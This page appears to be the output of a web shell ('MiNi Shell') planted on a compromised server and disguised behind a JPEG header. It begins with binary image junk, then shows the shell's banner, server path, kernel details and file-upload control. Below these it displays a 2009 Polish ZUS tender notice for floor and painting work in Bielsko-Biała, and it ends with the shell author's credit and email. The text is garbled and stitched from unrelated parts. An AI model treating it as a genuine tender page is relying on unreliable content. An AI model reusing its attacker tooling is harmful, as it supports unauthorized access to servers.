JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/74507-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: remont posadzek, roboty malarskie  w budynku Oddziału ZUS w Bielsku-Białej przy ul. Traugutta 2</b><br>
<b>Numer ogłoszenia: 74507 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Bielsku -Białej , ul. Krasińskiego 34, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 825 27 15, faks 033 825 27 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont posadzek, roboty malarskie  w budynku Oddziału ZUS w Bielsku-Białej przy ul. Traugutta 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I REMONT POSADZEK:
-	Ręczne wynoszenie i wnoszenie mebli z wykładaniem i wkładaniem dokumentów pod kontrolą pracownika zamawiającego
-	Zerwanie posadzek z tworzyw sztucznych,
-	Oczyszczenie przez mechaniczne szlifowanie podłoża cementowego z wyrównaniem powierzchni pod masę szpachlową 
-	Gruntowanie podłoży preparatem Schonox KH lub innym preparatem o podobnych parametrach i zakresie stosowania
-	Wykonanie warstwy wyrównawczej, niwelującej  i wygładzającej gr 5 mm z masy szpachlowej zbrojonej włóknami Schonox AP-FASER lub innym preparatem o podobnych parametrach i zakresie stosowania 
-	Przyklejenie wykładzin z tworzyw sztucznych bez warstwy izolacyjnej gr. minimum 2,00 mm (wykładzina elastyczna heterogeniczna typu TARKETT Optic Compact Sand lub inna o takich samych lub wyższych parametrach technicznych i zbliżonym wyglądzie).
-	Montaż progów (listwy osłaniające aluminiowe), zmniejszenie skrzydeł drzwiowych
-	Usunięcie z budynku materiałów z demontażu oraz wywiezienie na wysypisko miejskie.
Część II  ROBOTY MALARSKIE:
-	Ręczne wynoszenie i wnoszenie mebli z wykładaniem i wkładaniem dokumentów pod kontrolą pracownika zamawiającego
-	Osłony okien i żaluzji tekstylnych pionowych folią w pomieszczeniach biurowych i korytarzach
Malowanie olejne:
-	Stolarka wewnętrzna drzwiowa drewniana - dwukrotne malowanie farbą olejną uprzednio malowanej stolarki drzwiowej
-	Stolarka wew. drzwiowa stalowa ppoż - dwukrotne malowanie farbą olejną z jednokrotnym szpachlowaniem
-	Lamperie korytarze,  klatki schodowe - dwukrotne malowanie farbami olejnymi starych tynków ścian 
z dwukrotnym szpachlowaniem
-	Opalanie i malawoanie parapetów - opalanie farby olejnej z podokienników ioraz malowanie emalią chlorokauczukową powierzchni parapetów
Malowanie emulsyjne:
-	Pomieszczenia biurowe - dwukrotne malowanie ścian i sufitów farbą emulsyjną z przygotowaniem powierzchni,
-	Korytarze  - dwukrotne malowanie ścian i sufitów farbą emulsyjną z przygotowaniem powierzchni.
-	Klatki schodowe - dwukrotne malowanie ścian i sufitów farbą emulsyjną z przygotowaniem powierzchni, 
Roboty ogólnobudowlane:
-	Skasowanie wykwitów w pokój 22 oraz malowanie po skasowaniu wykwitów, 
-	 wykonanie zaślepienia nieczynnych drzwi między pomieszczeniami biurowymi płytami gips-kart, 
-	Renowacja konstrukcji stalowej (wzmocnienia stropu) w pom. 102, 
-	Demontaż starego pochwytu z tworzywa sztucznego i montaż nowego pochwytu drewnianego z malowaniem lakierem bezbarwnym,
-	Malowanie barierki klatki schodowej oraz krat przy wyjściach ewakuacyjnych
Zamawiający informuje, że do wykonania ww. prac malarskich należy użyć farb o jakości porównywalnej i nie gorszej niż farby firmy np. Kabe  - Farba Optima, Cieszyn - Akrylit-W
Prace malarskie, kolejność prac: 
- przygotowanie ścian i sufitów pod malowanie (mycie, szpachlowanie)
- pierwsze malowanie
- drugie malowanie
Każdy etap prac malarskich po wykonaniu musi być zgłoszony do Inspektora Nadzoru i potwierdzony odbiorem nie powiadomienie Inspektora Nadzoru i kontynuowanie prac spowoduje, że Zamawiający spowoduje przerwanie prac 
i wypowiedzenie umowy.

Szczegółowy zakres prac zawierają Specyfikacje Techniczne Wykonania i Odbioru Robót oraz przedmiary robót, które stanowią załącznik do SIWZ
Wskazana wizja lokalna w obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.      O udzielenie zamówienia ubiegać mogą się Wykonawcy, którzy:
1.1.   posiadają uprawnienia do wykonywania określonej działalności lub czynności;

 1.1.a.    ocena spełnienia powyższego warunku nastąpi poprzez analizę metodą spełnia  nie spełnia  złożonych przez   Wykonawcę dokumentów:
-aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-aktualne zaświadczenie imienne osoby kierującej, nadzorującej wykonanie prac ze strony Wykonawcy odnośnie członkostwa w Okręgowych Izbach w branży budowlanej zgodnie z art. 39 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inż. budownictwa oraz urbanistów Dz.U. Nr 5 z 2001 r. poz. 42
-oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem podatków bądź opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego ;
-oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ;

 1.1.b.    w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena spełnienia powyższego warunku nastąpi przez analizę, metodą spełnia / nie spełnia, złożonych przez powyższych Wykonawców niżej wymienionych oświadczeń i dokumentów:
-aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - musi być złożone przez każdego Wykonawcę;
-aktualne zaświadczenie imienne osoby kierującej, nadzorującej wykonanie prac ze strony Wykonawcy odnośnie członkostwa w Okręgowych Izbach w branży budowlanej zgodnie z art. 39 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inż. budownictwa oraz urbanistów Dz.U. Nr 5 z 2001 r. poz. 42 - musi być złożone przez jednego z Wykonawców.
-oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem podatków bądź opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - musi być złożone przez każdego Wykonawcę;
-oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - musi być złożone przez każdego Wykonawcę;

1.2. złożą oświadczenie w zakresie spełnienia warunków określonych w art.22 ust.1 ustawy - Prawo zamówień Publicznych;          
         
1.2.a.     ocena spełnienia tego warunku nastąpi przez analizę, metodą spełnia/nie spełnia, złożonego przez 
Wykonawcę  oświadczenia w zakresie spełnienia warunków określonych w art.22 ust.1 ustawy- Prawo zamówień publicznych;
1.2.b.     w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena spełnienia powyższego warunku nastąpi przez analizę, metodą spełnia/nie spełnia, złożonego oświadczenia w zakresie spełnienia tego warunków określonych w art.22 ust.1 ustawy- Prawo zamówień publicznych - musi być złożone przez każdego Wykonawcę;
1.2.c.   ocena spełnienia tego warunku nastąpi przez analizę, metodą spełnia/nie spełnia złożonego wykazu wykonanych w latach 2006-2009 zamówień  odpowiadających swoim rodzajem pracom budowlanym stanowiących przedmiot zamówienia, daty i miejsca wykonania oraz dokumenty potwierdzające wykonanie tych prac z należytą starannością - min 3 referencje każda od innego Inwestora (nie będą brane pod uwagę referencję wystawione  dla Wykonawców występujących jako podwykonawca prac).
1.2.d.     w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena spełnienia powyższego warunku nastąpi przez analizę, metodą spełnia/nie spełnia, złożonego wykazu wykonanych w latach 2006-2009 zamówień  odpowiadających swoim rodzajem pracom budowlanym stanowiących przedmiot zamówienia, daty i miejsca wykonania oraz dokumenty potwierdzające wykonanie tych prac z należytą starannością - min 3 referencje każda od innego Inwestora (nie będą brane pod uwagę referencję wystawione  dla Wykonawców występujących jako podwykonawca prac) - musi być złożone przez jednego z Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca składa następujące dokumenty i oświadczenia :  
        
1.1.	Formularz ofertowy - sporządzony wg  wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ;
1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.3.	Aktualne zaświadczenie imienne osoby kierującej, nadzorującej wykonanie prac ze strony Wykonawcy odnośnie członkostwa w Okręgowych Izbach w branży budowlanej zgodnie z art. 39 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inż. budownictwa oraz urbanistów Dz.U. Nr 5 z 2001 r. poz. 42
1.4.	Oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem podatków bądź opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego ;
1.5.	Oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ;
1.6.	Oświadczenie Wykonawcy o spełnieniu warunków określonych w art.22 ust.1 ustawy - Prawo zamówień publicznych - sporządzone wg wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ;
1.7.	Kosztorys ofertowy- szczegółowy ( Wykonawca musi podać dokładne nazwy materiałów z których będzie wykonywał pracę oraz producenta tych materiałów).
 1.8.      Wykaz wykonanych w latach 2006-2009 zamówień  odpowiadających swoim rodzajem pracom budowlanym  stanowiących przedmiot zamówienia, daty i miejsca wykonania oraz dokumenty potwierdzające wykonanie tych prac z należytą starannością - min. po 3 referencje dla każdej części postępowania; każda od innego Inwestora.
UWAGA!     Dokumenty wymienione powyżej mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę lub osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia /SIWZ/   można odebrać w  siedzibie zamawiającego: Bielsko-Biała, ul. Krasińskiego 38, bud. PTTK, II piętro, pok. 206 w godzinach od 8:00 do 14:00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 10:00, miejsce: Bielsko-Biała, ul. Krasińskiego 38, bud. PTTK, II piętro, pok. 206.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 01.07.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> REMONT POSADZEK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczne wynoszenie i wnoszenie mebli z wykładaniem i wkładaniem dokumentów pod kontrolą pracownika zamawiającego
Zerwanie posadzek z tworzyw sztucznych,
Oczyszczenie przez mechaniczne szlifowanie podłoża cementowego z wyrównaniem powierzchni pod masę szpachlową 
Gruntowanie podłoży preparatem Schonox KH lub innym preparatem o podobnych parametrach i zakresie stosowania
Wykonanie warstwy wyrównawczej, niwelującej  i wygładzającej gr 5 mm z masy szpachlowej zbrojonej włóknami Schonox AP-FASER lub innym preparatem o podobnych parametrach i zakresie stosowania 
Przyklejenie wykładzin z tworzyw sztucznych bez warstwy izolacyjnej gr. minimum 2,00 mm (wykładzina elastyczna heterogeniczna typu TARKETT Optic Compact Sand lub inna o takich samych lub wyższych parametrach technicznych i zbliżonym wyglądzie).
Montaż progów (listwy osłaniające aluminiowe), zmniejszenie skrzydeł drzwiowych
Usunięcie z budynku materiałów z demontażu oraz wywiezienie na wysypisko miejskie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty malarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Ręczne wynoszenie i wnoszenie mebli z wykładaniem i wkładaniem dokumentów pod kontrolą pracownika zamawiającego
-Osłony okien i żaluzji tekstylnych pionowych folią w pomieszczeniach biurowych i korytarzach
Malowanie olejne:
-Stolarka wewnętrzna drzwiowa drewniana - dwukrotne malowanie farbą olejną uprzednio malowanej stolarki drzwiowej
-Stolarka wew. drzwiowa stalowa ppoż - dwukrotne malowanie farbą olejną z jednokrotnym szpachlowaniem
-Lamperie korytarze,  klatki schodowe - dwukrotne malowanie farbami olejnymi starych tynków ścian 
z dwukrotnym szpachlowaniem
-Opalanie i malawoanie parapetów - opalanie farby olejnej z podokienników ioraz malowanie emalią chlorokauczukową powierzchni parapetów
Malowanie emulsyjne:
-Pomieszczenia biurowe - dwukrotne malowanie ścian i sufitów farbą emulsyjną z przygotowaniem powierzchni,
-Korytarze  - dwukrotne malowanie ścian i sufitów farbą emulsyjną z przygotowaniem powierzchni.
-Klatki schodowe - dwukrotne malowanie ścian i sufitów farbą emulsyjną z przygotowaniem powierzchni, 
Roboty ogólnobudowlane:
Skasowanie wykwitów w pokój 22 oraz malowanie po skasowaniu wykwitów, 
 wykonanie zaślepienia nieczynnych drzwi między pomieszczeniami biurowymi płytami gips-kart, 
Renowacja konstrukcji stalowej (wzmocnienia stropu) w pom. 102, 
Demontaż starego pochwytu z tworzywa sztucznego i montaż nowego pochwytu drewnianego z malowaniem lakierem bezbarwnym,
Malowanie barierki klatki schodowej oraz krat przy wyjściach ewakuacyjnych
Zamawiający informuje, że do wykonania ww. prac malarskich należy użyć farb o jakości porównywalnej i nie gorszej niż farby firmy np. Kabe  - Farba Optima, Cieszyn - Akrylit-W
Prace malarskie, kolejność prac: 
- przygotowanie ścian i sufitów pod malowanie (mycie, szpachlowanie)
- pierwsze malowanie
- drugie malowanie
Każdy etap prac malarskich po wykonaniu musi być zgłoszony do Inspektora Nadzoru i potwierdzony odbiorem nie powiadomienie Inspektora Nadzoru i kontynuowanie prac spowoduje, że Zamawiający spowoduje przerwanie prac 
i wypowiedzenie umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com